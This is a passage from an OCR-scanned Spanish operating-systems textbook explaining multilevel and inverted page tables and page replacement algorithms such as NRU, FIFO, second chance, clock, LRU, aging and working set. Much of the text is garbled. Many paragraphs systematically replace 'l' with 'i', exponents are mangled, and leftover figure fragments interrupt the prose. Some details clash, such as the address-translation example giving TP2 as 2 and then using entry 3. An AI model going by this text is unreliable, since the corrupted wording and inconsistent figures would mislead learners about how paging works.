sita E/S de disco. Por lo general, un fallo suave requiere de 10 a 20 instrucciones de máquina y se 
puede completar en unos cuantos nanosegundos. Por el contrario, un fallo duro ocurre cuando la 
misma página no está en memoria (y desde luego, tampoco en el TLB). Se requiere un acceso al 
disco para traer la página, lo cual tarda varios milisegundos. Un fallo duro es en definitiva un mi¬ 
llón de veces más lento que un fallo suave. 


3.3.4 Tablas de páginas para memorias extensas 

LosTLBsse pueden utilizar para acelerar las traducciones de direcciones virtuales a direcciones fí¬ 
sicas sobre el esquema original de la tabla de páginas en memoria. Pero ése no es el único proble¬ 
ma que debemos combatir. Otro problema es cómo lidiar con espacios de direcciones virtuales muy 
extensos. A continuación veremos dos maneras de hacerlo. 

Tablas de páginas multinivel 

Como primer método, considere el uso de una tabla de páginas multinivel. En la figura 3-13 se 
muestra un ejemplo simple. E n la figura 3-13(a) tenemos una dirección virtual de 32 bits que se par- 
ticiona en un campo TPl de 10 bits, un campo TP2 de 10 bits y un campo Desplazamiento de 12 
bits. Como los desplazamientos son de 12 bits, las páginas son de 4 KB y hay un total de 2^°. 

El secreto del método de la tabla de páginas multinivel es evitar mantenerlas en memoria todo 
el tiempo, y en especial, aquellas que no se necesitan. Por ejemplo, suponga que un proceso nece¬ 
sita 12 megabytes: los 4 megabytes inferiores de memoria para el texto del programa, lo siguientes 
4 megabytes para datos y los 4 megabytes superiores para la pila. Entre la parte superior de los da¬ 
tos y la parte inferior de la pila hay un hueco gigantesco que no se utiliza. 

En la figura 3-13(b) podemos ver cómo funciona la tabla de página de dos niveles en este ejem¬ 
plo. A la izquierda tenemos la tabla de páginas de nivel superior, con 1024 entradas, que correspon¬ 
den al campo TPl de 10 bits. Cuando se presenta una dirección virtual a la M M U, primero extrae 
el campo TPl y utiliza este valor como índice en la tabla de páginas de nivel superior. Cada una de 
estas 1024 entradas representa 4 M, debido a que todo el espacio de direcciones virtuales de 4 gi- 
gabytes (es decir, de 32 bits) se ha dividido en trozos de 4096 bytes. 
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Figura 3-13. (a) Una dirección de 32 bits con dos campos de tabias de páginas. 

(b) Tabias de páginas de dos niveies. 

La entrada que se localiza al indexar en la tabla de páginas de nivel superior produce la dirección 
(o número de marco de página) de una tabla de páginas de segundo nivel. La entrada 0 de la tabla de 
páginas de nivel superior apunta a la tabla de páginas para el texto del programa, la entrada 1 apunta 
a la tabla de páginas para los datos y la entrada 1023 apunta a la tabla de páginas para la pila. Las otras 
entradas (sombreadas) no se utilizan. Ahora el campo TP2 se utiliza como índice en la tabla de pági¬ 
nas de segundo nivel seleccionada para buscar el número de marco de página para esta página en sí. 

Como ejemplo, considere la dirección virtual de 32 bits 0x00403004 (4,206,596 decimal), que 
se encuentra 12,292 bytes dentro de los datos. Esta dirección virtual corresponde a TPl = 1, 
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TP2 = 2 y Desplazamiento = 4. La M M U utiliza primero a TPl para indexar en la tabla de pági¬ 
nas de nivel superior y obtener la entrada 1, que corresponde a las direcciones de 4M a 8M . Des¬ 
pués utiliza PT2 para indexar en la tabla de páginas de segundo nivel que acaba de encontrar y 
extrae la entrada 3, que corresponde a las direcciones de 12288 a 16383 dentro de su trozo de 4M 
(es decir, las direcciones absolutas de 4,206,592 a 4,210,687). Esta entrada contiene el número de 
marco de la página que contiene la dirección virtual 0x00403004. Si esa página no está en la me¬ 
moria, el bit de presente/ausente en la entrada de la tabla de páginas será cero, con lo cual se pro¬ 
ducirá un fallo de página. Si la página está en la memoria, el número del marco de página que se 
obtiene de la tabla de páginas de segundo nivel se combina con el desplazamiento (4) para construir 
la dirección física. Esta dirección se coloca en el bus y se envía a la memoria. 

Lo interesante acerca de la figura 3-13 es que, aunque el espacio de direcciones contiene más 
de un millón de páginas, en realidad sólo cuatro tablas de páginas son requeridas: la tabla de nivel 
superior y las tablas de segundo nivel de0a4M (para el texto del programa), de 4M a8M (páralos 
datos) y los 4M superiores (para la pila). Los bits de presente/ausente en 1021 entradas de la tabla de 
páginas de nivel superior están en 0 y obligan a que se produzca un fallo de página si se tratan 
de utilizar alguna vez. En caso de que esto ocurra, el sistema operativo observará que el proceso es¬ 
tá tratando de referenciar memoria que no debey tomará la acción apropiada, como enviar una se¬ 
ñal o eliminarlo. En este ejemplo hemos elegido números redondos para los diversos tamaños y que 
TPl sea igual a TP2, pero en la práctica también es posible elegir otros valores. 

El sistema de tablas de páginas de dos niveles de la figura 3-13 se puede expandir a tres, cua¬ 
tro o más niveles. Entre más niveles se obtiene una mayor flexibilidad, pero es improbable que la 
complejidad adicional sea de utilidad por encima de tres niveles. 

Tablas de páginas invertidas 

Para los espacios de direcciones virtuales de 32 bits, la tabla de páginas multinivel funciona bastan¬ 
te bien. Sin embargo, a medida que las computadoras de 64 bits se hacen más comunes, la situación 
cambia de manera drástica. Si el espacio de direcciones es de 2®^ bytes, con páginas de 4 K B, nece¬ 
sitamos una tabla de páginas con 2®^ entradas. Si cada entrada es de 8 bytes, la tabla es de más de 30 
millones de gigabyes (30 PB). Ocupar 30 millones de gigabytes sólo para la tabla de páginas no es 
una buena idea por ahora y probablemente tampoco lo sea para el próximo año. En consecuencia, se 
necesita una solución diferente para los espacios de direcciones virtuales paginados de 64 bits. 

Una de esas soluciones es la tabla de páginas invertida. En este diseño hay una entrada por 
cada marco de página en la memoria real, en vez de tener una entrada por página de espacio de di¬ 
recciones virtuales. Por ejemplo, con direcciones virtuales de 64 bits, una página de4KBylGB 
de RAM , una tabla de páginas invertida sólo requiere 262,144 entradas. La entrada lleva el regis¬ 
tro de quién (proceso, página virtual) se encuentra en el marco de página. 

Aunque las tablas de página invertidas ahorran grandes cantidades de espacio, al menos cuan¬ 
do el espacio de direcciones virtuales es mucho mayor que la memoria física, tienen una seria des¬ 
ventaja: la traducción de dirección virtual a dirección física se hace mucho más difícil. Cuando el 
proceso n hace referencia a la página virtual p, el hardwareya no puede buscar la página física usan¬ 
do p como índice en la tabla de páginas. En vez de ello, debe buscar una entrada (n, p) en toda la 
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tabla de páginas invertida. Lo que es peor: esta búsqueda se debe reaiizar en cada referencia a me¬ 
moria, no sóio en ios faiios de página. Buscar en una tabia de 256 K en cada referencia a memoria 
no es ia manera de hacer que ia máquina sea desiumbrantemente rápida. 

La forma de sai ir de este di i ema es utiiizarei TLB. Si ei TLB puede contener todas ias páginas 
de uso frecuente, ia traducción puede ocurrir con iguai rapidez que con ias tabias de páginas regu¬ 
iares. Sin embargo, en un faiio de TLB ia tabia de páginas invertida tiene que buscarse mediante 
software. Una manera factibie de reaiizar esta búsqueda es tener una tabia de hash arregiada según 
ei hash de ia dirección virtuai. Todas ias páginas virtuaies que se encuentren en memoria y tengan ei 
mismo vaior de hash se encadenan en conjunto, como se muestra en ia figura 3-14. Si ia tabia de 
hash tiene tantas ranuras como ias páginas físicas de ia máquina, ia cadena promedio tendrá sóio 
una entrada, con io cuai se aceiera de manera considerabie ia asociación. U na vez que se ha encon¬ 
trado ei número de marco de página, se introduce ei nuevo par (virtuai, física) en ei TLB. 


Tabla de páginas 
tradicional con una 
entrada para cada 
una de las 2^2 páginas 


252 -1 


Indexada por 
página virtual 


La memoria física de 
1 GB tiene 2t8 marcos 

de página de 4 KB Tabla de hash 


218 .1 



O 


218.1 



O 1= 
Indexada por 
hash en página 
virtual 



Página Marco 
virtual de página 


Figura 3-14. Comparación de una tabla de páginas tradicional con una tabla de pági¬ 
nas invertida. 


Las tabias de páginas invertidas son comunes en ias máquinas de 64 bits ya queinciuso con un 
tamaño de página muy grande, ei número de entradas en ia tabia de páginas es enorme. Por ejem- 
pio, con páginas de 4 M B y direcciones virtuaies de 64 bits, se necesitan 2^^ entradas en ia tabia de 
páginas. Otros métodos para manejar memorias virtuaies extensas se pueden encontrar en Taiiuri y 
coiaboradores (1995). 

3.4 ALGORITMOS DE REEMPLAZO DE PÁGINAS 

Cuando ocurre un faiio de página, ei sistema operativo tiene que eiegir una página para desaiojaria 
(eiiminaria de memoria) y hacer espacio para ia página entrante. Si ia página a eiiminar se modificó 
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mientras estaba en memoria, debe voiver a escribirse en ei disco para actuaiizar ia copia dei mismo. 
No obstante, si ia página no se ha modificado (por ejempio, si contiene ei texto dei programa), ia 
copia ya está actuaiizada y no se necesita rescribir. La página que se va a ieer sóio sobrescribe en 
ia página que se va a desalojar. 

Aunque sería posibie eiegir una página ai azar para desaiojaria en cada faiio de página, ei ren¬ 
dimiento dei sistema es mucho mayor si se seiecciona una página que no sea de uso frecuente. Si 
se ei i mi na una página de uso frecuente, tai vez tenga que traerse de vueita rápidamente, i o cuai pro¬ 
duce una sobrecarga adicionai. Se ha reaiizado mucho trabajo, tanto teórico como experimentai en 
ei tema de ios aigoritmos de reempiazo de páginas. A continuación describiremos aigunos de ios ai- 
goritmos más importantes. 

Vaie ia pena observar que ei probiema dei "reempiazo de páginas" ocurre también en otras 
áreas dei diseño computacionai. Por ejempio, ia mayoría de ias computadoras tienen una o más me¬ 
morias cachés que consisten en bioques de memoria de 32 bytes o 64 bytes de uso reciente. Cuan¬ 
do ia caché está iiena, hay que eiegir cierto bioque para eiiminario. Este probiema es precisamente 
ei mismo que ia reempiazo de páginas, sóio que en una escaia de tiempo menor (tiene que reaiizar- 
seen unos cuantos nanosegundos, no miiisegundoscomo en ei reempiazo de páginas). La razón de 
tener una menor escaia de tiempo es que ios faiios de bioques de caché se satisfacen desde ia me¬ 
moria principai, que no tiene tiempo de búsqueda ni iatencia rotacionai. 

Un segundo ejempio es en un servidor Web. Ei servidor puede mantener cierto número de páginas 
Web de uso muy frecuente en su memoria caché. Sin embargo, cuando ia memoria caché está iiena y 
se hace referencia a una nueva página, hay que decidir cuái página Web se debe desaiojar. Las consi¬ 
deraciones son simiiaresa iasdeias páginas de memoria virtuai, excepto porei hecho de que ias pági¬ 
nas Web nunca se modifican en ia caché, por io cuai siempre hay una copia fresca "en ei disco". En un 
sistema de memoria vi rtuai, ias páginas en memoria principai pueden estar sucias o iimpias. 

En todos ios aigoritmos de reempiazo de páginas que anaiizaremos a continuación, surge cier¬ 
ta cuestión: ai desaiojar una página deia memoria, ¿tiene que ser una de ias propias páginas dei pro¬ 
ceso faiiido o puede ser una página que pertenezca a otro proceso? En ei primer caso, estamos 
iimitando en efecto cada proceso a un número fijo de páginas: en ei segundo caso no. Ambas son 
posibiiidades. En ia sección 3-5.1 voiveremos a ver este punto. 

3.4.1 EI algoritmo de reemplazo de páginas óptimo 

Ei mejor aigoritmo de reempiazo de páginas posibie es fácii de describir, pero imposibiede impie- 
mentar: ai momento en que ocurre un faiio de página, hay cierto conjunto de páginas en memoria 
y una de éstas se referenciará en ia siguiente instrucción (ia página que contiene ia instrucción); 
otras páginas tai vez no se referencien sino hasta 10,100 o tai vez 1000 instrucciones después. Ca¬ 
da página se puede etiquetar con ei número de instrucciones que se ejecutarán antes de que se ha¬ 
ga referencia por primera vez a esa página. 

Ei aigoritmo óptimo de reempiazo de páginas estabiece que ia página con ia etiqueta más aita 
debe eiiminarse. Si una página no se va a utiiizar durante 8 miñones de instrucciones y otra no se 
va a utiiizar durante 6 miñones de instrucciones, ai eiiminar ia primera se enviará ei faiio de pági¬ 
na que ia obtendrá de vueita io más iejos posibie en ei futuro. Ai iguai que ias personas, ias com¬ 
putadoras tratan de posponer ios eventos indeseabies ei mayor tiempo posibie. 
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El único problema con este algoritmo es que no se puede realizar. AI momento del fallo de pá¬ 
gina, el sistema operativo no tiene forma de saber cuándo será la próxima referencia a cada una de 
las páginas (vimos una situación similar antes, con el algoritmo de planificación del trabajo más 
corto primero: ¿cómo puede saber el sistema cuál trabajo es más corto?). Aún así, al ejecutaron pro¬ 
grama en un simulador y llevar la cuenta de todas las referencias a páginas, es posible implemen- 
tar un algoritmo óptimo de reemplazo de página en la segunda corrida, al utilizar la información de 
referencia de páginas recolectada durante la primera corrida. 

De esta manera, se puede comparar el rendimiento de los algoritmos realizables con el mejor 
posible. Si un sistema operativo logra un rendimiento de, por ejemplo, sólo 1 por ciento peor que 
el algoritmo óptimo, el esfuerzo invertido en buscar un mejor algoritmo producirá cuando mucho 
una mejora del 1 por ciento. 

Para evitar cualquier posible confusión, hay que aclarar que este registro de referencias de pá¬ 
ginas se refiere sólo al programa que se acaba de medir y sólo con una entrada específica. Por lo 
tanto, el algoritmo de reemplazo de páginas que se derive de esto es específico para ese programa 
y esos datos de entrada. A unque este método es útil para evaluar los algoritmos de reemplazo de pá¬ 
ginas, no es útil en sistemas prácticos. A continuación estudiaremos algoritmos que son útiles en 
sistemas reales. 


3.4.2 EI algoritmo de reemplazo de páginas: no usadas recientemente 

Para permitir que el sistema operativo recolecte estadísticas útiles sobre el uso de páginas, la ma¬ 
yor parte de las computadoras con memoria virtual tienen dos bits de estado asociados a cada pági¬ 
na. R se establece cada vez que se hace referencia a la página (lectura o escritura): M se establece 
cuando se escribe en la página (es decir, se modifica). Los bits están contenidos en cada entrada de 
la tabla de páginas, como se muestra en la figura 3-11. Es importante tener en cuenta que estos bits 
se deben actualizar en cada referencia a la memoria, por lo que es imprescindible que se establez¬ 
can mediante el hardware. Una vez que se establece un bit en 1, permanece así hasta que el siste¬ 
ma operativo lo restablece. 

Si el hardware no tiene estos bits, pueden simularse de la siguiente forma. Cuando se inicia un 
proceso, todas sus entradas en la tabla de páginas se marcan como que no están en memoria. Tan 
pronto como se haga referencia a una página, ocurrirá un fallo de página. Entonces, el sistema ope¬ 
rativo establece el bit R (en sus tablas internas), cambia la entrada en la tabla de páginas para que 
apunte a la página correcta, con modo de SÓLO LECTURA, y reinicia la instrucción. Si la página 
se modifica después, ocurrirá otro fallo de página que permite al sistema operativo establecer el bit 
M y cambiar el modo de la página a LECTURA/ESCRITURA. 

Los bits R y M se pueden utilizar para construir un algoritmo simple de paginación de la si¬ 
guiente manera. Cuando se inicia un proceso, ambos bits de página para todas sus páginas se esta¬ 
blecen en O mediante el sistema operativo. El bit R se borra en forma periódica (en cada interrupción 
de reloj) para diferenciar las páginas a las que no se ha hecho referencia recientemente de las que 
si se han referenciado. 

Cuando ocurre un fallo de página, el sistema operativo inspecciona todas las páginas y las di¬ 
vide en 4 categorías con base en los valores actuales de sus bits R y M: 
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Clase 0: no ha sido referenciada, no ha sido modificada. 

Ciase 1: no ha sido referenciada, ha sido modificada. 

Ciase 2: ha sido referenciada, no ha sido modificada. 

Ciase 3: ha sido referenciada, ha sido modificada. 

A unque ias páginas de ia ciase 1 parecen a primera instancia imposibies, ocurren cuando una interrup¬ 
ción de reioj borra ei bit R de una página de ia ciase 3. Las interrupciones de reioj no borran ei bit M 
debido a que esta información se necesita para saber si ia página se ha vueito a escribir en ei disco o 
no. Ai borrar R pero no M se obtiene una página de ciase 1. 

Ei aigoritmo NRU (Not Recentiy Used, No usada recientemente) eiimina una página ai azar 
de ia ciase de menor numeración que no esté vacía. En este aigoritmo está impiícita ia idea de que 
es mejor eiiminar una página modificada a ia que no se haya hecho referencia en ai menos un pui- 
so de reioj (por io generai, unos 20 mseg) que una página iimpia de uso frecuente. La principai 
atracción dei NRU esqueesfácii de comprender, moderadamente eficiente de impiementar y pro¬ 
porciona un rendimiento que, aunque no es óptimo, puede ser adecuado. 

3.4.3 EI algoritmo de reemplazo de páginas: Primera en entrar, 
primera en salir (PIFO) 

Otro aigoritmo de paginación con baja sobrecarga es ei de Primera en entrar, primera en saiir 
(First-ln, First-Out, PIFO). Para iiustrar cómo funciona, considere un supermercado con suficien¬ 
tes repisas como para mostrar exactamente k productos distintos. Un día, cierta empresa introduce 
un nuevo aiimento de conveniencia: yogurt orgánico instantáneo iiofiiizado que se puede reconsti¬ 
tuir en un horno de microondas. Es un éxito inmediato, por io que nuestro supermercado finito se 
tiene que deshacer de un producto antiguo para tenerio en existencia. 

Una posibiiidad es buscar ei producto que ei supermercado haya tenido en existencia por más 
tiempo (por ejempio, aigo que se empezó a vender hace 120 años) y deshacerse de éi por ia razón 
de que nadie está interesado ya. En efecto, ei supermercado mantiene una iista iigada de todos ios 
productos que vende actuaimente en ei orden en ei que se introdujeron. Ei nuevo pasa a ia parte fi- 
nai de i a iista; ei que está ai frente de ia iista se eiimina. 

Como un aigoritmo de reempiazo de páginas, se apiica ia misma idea. Ei sistema operativo 
mantiene una iista de todas ias páginas actuai mente en memoria, en donde ia iiegada más reciente 
está en i a parte f inai y ia menos reciente en i a parte frontai. En un faiio de página, se eiimina ia pá¬ 
gina que está en ia parte frontai y ia nueva página se agrega a ia parte finai de ia iista. Cuando se 
apiica en ias tiendas, FIFO podría eiiminar ia gomina para ei bigote, pero también podría eiiminar 
harina, sai o mantequiiia. Cuando se apiica a ias computadoras, surge ei mismo probiema. Por esta 
razón es raro que se utiiice FIFO en su forma pura. 

3.4.4 EI algoritmo de reemplazo de páginas: segunda oportunidad 

Una modificación simpieai aigoritmo FIFO que evita el problema de descartar una página de uso 
frecuente es inspeccionar el bit R de la página más antigua. Si es 0, la página es antigua y no se ha 
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utilizado, por lo que se sustituye de inmediato. Si el bit R es 1, el bit se borra, la página se pone al 
final de la lista de páginas y su tiempo de carga se actualiza, como si acabara de llegar a la memo¬ 
ria. Después la búsqueda continúa. 

La operación de este algoritmo, conocido como segunda oportunidad, se muestra en la figu¬ 
ra 3-15. En la figura 3-15(a) vemos que las páginas de la A a la H se mantienen en una lista ligada 
y se ordenan con base en el tiempo en que llegaron a la memoria. 


Página que se cargó primero 

Página cargada 
más recientemente 


(a) 




(b) 


A se considera como 
una página cargada 
nuevamente 


Figura 3-15. Operación del algoritmo de la segunda oportunidad, (a) Páginas ordena¬ 
das con base en PIFO, (b) Lista de las páginas si ocurre un fallo de página en el tiem¬ 
po 20 y A tiene su bit R activado. Los números encima de las páginas son sus tiempos 
de carga. 


Suponga que ocurre un fallo de página en el tiempo 20. La página más antigua es A, que llegó en 
el tiempo 0, cuando se inició el proceso. Si el bit R de A esta desactivado, se desaloja de la memoria, 
ya sea escribiéndola en el disco (si está sucia) o sólo se abandona (si está limpia). Por otro lado, si el 
bit R está activado, A se coloca al final de la lista y su "tiempo de carga" se restablece al tiempo ac¬ 
tual (20). El bit R también esta desactivado. La búsqueda de una página adecuada continúa con B. 

Lo que el algoritmo de segunda oportunidad está buscando es una página antigua a la que no 
se haya hecho referencia en el intervalo de reloj más reciente. Si se ha hecho referencia a todas las 
páginas, el algoritmo segunda oportunidad se degenera y se convierte en PIFO puro. De manera es¬ 
pecífica, imagine que todas las páginas en la figura 3-15(a) tienen sus bitsR activados. Una por una, 
el sistema operativo mueve las páginas al final de la lista, desactivando el bit R cada vez que adjun¬ 
ta una página al final de la lista. En un momento dado regresará a la página A, que ahora tiene su 
bitR desactivado. En este punto, A se desaloja. Por ende, el algoritmo siempre termina. 


3.4.5 El algoritmo de reemplazo de páginas: reloj 

Aunque el algoritmo segunda oportunidad es razonable, también es innecesariamente ineficiente de¬ 
bido a que está moviendo constantemente páginas en su lista. Un mejor método sería mantener todos 
los marcos de página en una lista circular en forma de reloj, como se muestra en la figura 3-16. La 
manecilla apunta a la página más antigua. 

Cuando ocurre un fallo de página, la página a la que apunta la manecilla se inspecciona. Si el bit 
R esO, la página se desaloja, se inserta la nueva página en el reloj en su lugar y la manecilla se avanza 
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Cuando ocurre un fallo de página, 
la página a la que apunta la manecilla 
se inspecciona. La acción a realizar 
depende del bit R: 

R = 0: Desaloja la página 
R = 1: Desactiva R y avanza la manecilla 



Figura 3-16. El algoritmo de reemplazo de páginas en reloj. 


una posición. Si R es 1, se borra y la manecilla se avanza a la siguiente página. Este proceso se repite 
hasta encontrar una página con R = 0. No es de sorprender que a este algoritmo se le llame en reloj. 

3.4.6 EI algoritmo de reemplazo de páginas: menos usadas 
recientemente (L RU) 

Una buena aproximación al algoritmo óptimo se basa en la observación de que las páginas que se 
hayan utilizado con frecuencia en las últimas instrucciones, tal vez se volverán a usar con frecuen¬ 
cia en las siguientes. Por el contrario, las páginas que no se hayan utilizado por mucho tiempo pro¬ 
bablemente seguirán sin utilizarse por mucho tiempo más. Esta idea sugiere un algoritmo factible: 
cuando ocurra un fallo de página, hay que descartar la página que no se haya utilizado durante la 
mayor longitud de tiempo. A esta estrategia se le conoce como paginación LRU (Least Recently 
U sed, M enos usadas recientemente). 

Aunque en teoría el algoritmo LRU es realizable, no es barato. Para implementar el LRU por 
completo, es necesario mantener una lista enlazada de todas las páginas en memoria, con la página 
de uso más reciente en la parte frontal y la de uso menos reciente en la parte final. La dificultad es 
que la lista debe actualizarse en cada referencia a memoria. Buscar una página en la lista, eliminar¬ 
la y después pasarla al frente es una operación que consume mucho tiempo, incluso mediante hard¬ 
ware (suponiendo que pudiera construirse dicho hardware). 

Sin embargo, hay otras formas de implementar el algoritmo LRU con hardware especial. Con¬ 
sideremos primero la forma más simple. Este método requiere equipar el hardware con un contador 
de 64 bits, llamado C, el cual se incrementa de manera automática después de cada instrucción. 
Además, cada entrada en la tabla de páginas debe tener también un campo lo bastante grande como 
para poder guardar el contador. Después de cada referencia a memoria, el valor actual de C se al¬ 
macena en la entrada en la tabla de páginas para la página que se acaba dereferenciar. Cuando ocu¬ 
rre un fallo de página, el sistema operativo examina todos los contadores en la tabla de páginas para 
encontrar el menor. Esa página es la de uso menos reciente. 
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Ahora veamos un segundo algoritmo LRU mediante hardware. Para una máquina con n marcos 
de página, el hardware del LRU puede mantener una matriz den x n bits (inicialmente, todos son 0). 
Cada vez que se hace referencia a la página k, el hardware primero establece todos los bits de la fila 
k en 1 y después todos los bits de la columna k en 0. En cualquier instante, la fila cuyo valor binario 
sea menor es la de uso menos reciente, la fila cuyo valor sea el siguiente más bajo es la del siguiente 
uso menos reciente, y así en lo sucesivo. El funcionamiento de este algoritmo se muestra en la figura 
3-17 para cuatro marcos de página y referencias a páginas en el siguiente orden: 

0123210323 

Después de hacer referencia a la página 0, tenemos la situación de la figura 3-17(a). Después de ha¬ 
cer referencia a la página 1, tenemos la situación de la figura 3-17(b), y así en lo sucesivo. 
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Figura 3-17. LRU usando una matriz cuando se hace referencia a las páginas en el or¬ 
den 0,1, 2, 3, 2,1, 0, 3, 2, 3. 


3.4.7 Simulación de LRU en software 


Aunque los dos algoritmos LRU anteriores son (en principio) realizables, muy pocas máquinas (si 
acaso) tienen el hardware requerido. En vez de ello, se necesita una solución que puede impiemen¬ 
tarse en software. Una posibilidad es el algoritmo NFU (Not Frequently Used, No utilizadas fre¬ 
cuentemente). Este algoritmo requiere un contador de software asociado con cada página, que al 
principio es cero. En cada interrupción de reloj, el sistema operativo explora todas las páginas en 
memoria. Para cada página se agrega el bit R, que es 0 o 1, al contador. Los contadores llevan la 
cuenta aproximada de la frecuencia con que se hace referencia a cada página. Cuando ocurre un fa¬ 
llo de página, se selecciona la página con el contador que sea menor para sustituirla. 

El principal problema con el algoritmo NFU es que nunca olvida nada. Por ejemplo, en un com¬ 
pilador con varias pasadas, las páginas que se utilizaron con frecuencia durante la pasada 1 podrían 
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tener todavía una cuenta alta en las siguientes pasadas. De hecho, si ia pasada 1 tiene ei tiempo de 
ejecución más iargo de todas ias pasadas, ias páginas que contienen ei código para ias pasadas sub¬ 
siguientes pueden tener siempre cuentas menores que ias páginas de ia pasada 1. En consecuencia, 
ei sistema operativo eiiminará páginas útiies, en vez de páginas que ya no se hayan utiiizado. 

Por fortuna, una pequeña modificación ai aigoritmo NFU ie permite simuiar ei aigoritmo LRU 
muy bien. La modificación consta dedos partes. Primero, cada uno de ios contadores se despieza a 
ia derecha 1 bit antes de agregar ei bit R. Después, ei bit R se agrega ai bit de más a ia izquierda, 
en iugar de sumarse ai bit de más a ia derecha. 

La figura 3-18 iiustra cómo funciona ei aigoritmo modificado, conocido como envqecimien- 
to (aging). Suponga que después dei primer puiso de reioj ios bits R para ias páginas de ia O a ia 
5 tienen ios vaiores 1, 0,1, 0,1 y 1, respectivamente (ia página O es 1, ia página 1 es O, ia página 2 
es 1, etc.). En otras paiabras, entre ios puisos O y 1 se hizo referencia a ias páginas O, 2, 4 y 5, es- 
tabieciendo sus bits R en 1, mientras que ios de ias otras páginas se quedaron en 0. Después de que 
se han despiazado ios seis contadores correspondientes y ei bit R se ha insertado a ia izquierda, tie¬ 
nen ios vaiores que se muestran en ia figura 3-18(a). Las cuatro coiumnas restantes muestran ios 
seis contadores después de ios siguientes cuatro puisos de reioj. 
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Figura 3-18. El algoritmo de envejecimiento simula el LRU en software. Aquí se 
muestran seis páginas para cinco pulsos de reloj. Los cinco pulsos de reloj se represen¬ 
tan mediante los incisos (a) a (e). 

Cuando ocurre un faiio de página, se eiimina ia página cuyo contador sea ei menor. Está ciaro 
que una página a ia que no se haya hecho referencia durante, por ejempio, cuatro puisos de reioj, 
tendrá cuatro ceros a ia izquierda en su contador, y por ende tendrá un vaior menor que un conta¬ 
dor ai que no se haya hecho referencia durante tres puisos de reioj. 

Este aigoritmo difiere dei de LRU en dos formas. Considere ias páginas 3 y 5 en ia figu¬ 
ra 3-18(e). Ninguna se ha referenciado durante dos puisos de reioj: ambas se referenciaron en ei 




































































































SECCION 3.4 


ALGORITMOS DE REEMPLAZO DE PÁGINAS 


209 


pulso anterior a esos dos. De acuerdo con el algoritmo LRU, si hay que sustituir una página, de¬ 
bemos elegir una de estas dos. El problema es que no sabemos a cuál de ellas se hizo referencia 
por última vez en el intervalo entre el pulso 1 y el 2. Al registrar sólo un bit por cada intervalo de 
tiempo, hemos perdido la capacidad de diferenciar las referencias anteriores en el intervalo de re¬ 
loj de las que ocurrieron después. Todo lo que podemos hacer es eliminar la página 3, debido a que 
también se hizo referencia a la página 5 dos pulsos de reloj antes, y a la página 3 no. 

La segunda diferencia entre los algoritmos de LRU y envejecimiento es que en este último los 
contadores tienen un número finito de bits (8 en este ejemplo), lo cual limita su horizonte pasado. 
Suponga que dos páginas tienen cada una un valor de 0 en su contador; todo lo que podemos hacer 
es elegir una de ellas al azar. En realidad, bien podría ser una de las páginas a las que se haya hecho 
referencia nueve pulsos atrás, y la otra 1000 pulsos atrás. No tenemos forma de determinarlo. Sin 
embargo, en la práctica bastan 8 bits si un pulso de reloj es de aproximadamente 20 milisegundos. 
Si no se ha hecho referencia a una página en 160 milisegundos, tal vez no sea tan importante. 


3.4.8 El algoritmo de reemplazo de páginas: conjunto de trabajo 

En la forma más pura de paginación, los procesos inician sin ninguna de sus páginas en la memo¬ 
ria. Tan pronto como la CPU trata de obtener la primera instrucción, recibe un fallo de página, cau¬ 
sando que el sistema operativo tenga que traer la página que contiene la primera instrucción. Por lo 
general a este fallo le siguen otros fallos de página por las variables globales y la pila. Después de 
cierto tiempo, el proceso tiene la mayoría de las páginas que necesita y se establece para ejecutar¬ 
se con relativamente pocos fallos de página. A esta estrategia se le conoce como paginación bajo 
demanda, debido a que las páginas se cargan sólo según la demanda, no por adelantado. 

Desde luego que es fácil escribir un programa de prueba que lea de manera sistemática todas 
las páginas en un espacio de direcciones extenso, produciendo tantos fallos de página que no haya 
suficiente memoria como para contenerlos todos. Por fortuna, la mayoría de los procesos no traba¬ 
jan de esta manera. Exhiben una iocaiidad de referencia, lo cual significa que durante cualquier 
fase de ejecución el proceso hace referencia sólo a una fracción relativamente pequeña de sus pá¬ 
ginas. Por ejemplo, cada pasada de un compilador con varias pasadas hace referencia sólo a una 
fracción de todas las páginas y cada vez es una fracción distinta. 

El conjunto de páginas que utiliza un proceso en un momento dado se conoce como su conjun¬ 
to de trabajo (Denning, 1968a: Denning, 1980). Si todo el conjunto de trabajo está en memoria, el 
proceso se ejecutará sin producir muchos fallos hasta que avance a otra fase de ejecución (por ejem¬ 
plo, la siguiente pasada del compilador). Si la memoria disponible es demasiado pequeña como pa¬ 
ra contener todo el conjunto de trabajo completo, el proceso producirá muchos fallos de página y 
se ejecutará lentamente, ya que para ejecutar una instrucción se requieren unos cuantos nanosegun- 
dos y para leer una página del disco se requieren en general 10 milisegundos. A una proporción de una 
o dos instrucciones porcada 10 milisegundos, se requeriría una eternidad para terminar. Se dice que 
un programa que produce fallos de página cada pocas instrucciones está sobrepaginando {thras- 
hing) (Denning, 1968b). 

En un sistema de multiprogramación, los procesos se mueven con frecuencia al disco (es decir, 
todas sus páginas se eliminan de la memoria) para dejar que otros procesos tengan oportunidad de 
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usar la CPU. Aquí surge la pregunta de qué hacer cuando un proceso se regresa una y otra vez. Téc¬ 
nicamente, no hay que hacer nada. El proceso producirá fallos de página sólo hasta que se haya car¬ 
gado su conjunto de trabajo. El problema es que tener 20,100 o incluso 1000 fallos de página cada 
vez que se carga un proceso es algo lento, además de que se desperdicia un tiempo considerable de 
la CPU, ya que el sistema operativo tarda unos cuantos milisegundos de tiempo de la CPU en pro¬ 
cesar un fallo de página. 

Por lo tanto, muchos sistemas de paginación tratan de llevar la cuenta del conjunto de trabajo 
de cada proceso y se aseguran que esté en memoria antes de permitir que el proceso se ejecute. Es¬ 
te método se conoce como modelo del conjunto de trabajo (Denning, 1970). Está diseñado para 
reducir en gran parte la proporción de fallos de página. Al proceso de cargar las páginas antes de 
permitir que se ejecuten los procesos también se le conoce como prepaginación. Tenga en cuenta 
que el conjunto de trabajo cambia con el tiempo. 

Desde hace mucho se sabe que la mayor parte de los programas no hacen referencia a su espa¬ 
cio de direcciones de manera uniforme, sino que las referencias tienden a agruparse en un pequeño 
número de páginas. Una referencia a memoria puede obtener una instrucción, puede obtener datos 
o puede almacenar datos. En cualquier instante de tiempo t, existe un conjunto consistente de todas 
las páginas utilizadas por las k referencias a memoria más recientes. Este conjunto w(k, t), es el de 
trabajo. Debido a que las k = 1 referencias más recientes deben haber utilizado todas las páginas 
utilizadas por las k > 1 referencias más recientes y tal vez otras, w(k, t) es una función de k mono- 
tónicamente no decreciente. El límite de w(k, t) a medida que k crece es finito, debido a que un pro¬ 
grama no puede hacer referencia a más páginas de las que contiene su espacio de direcciones, y 
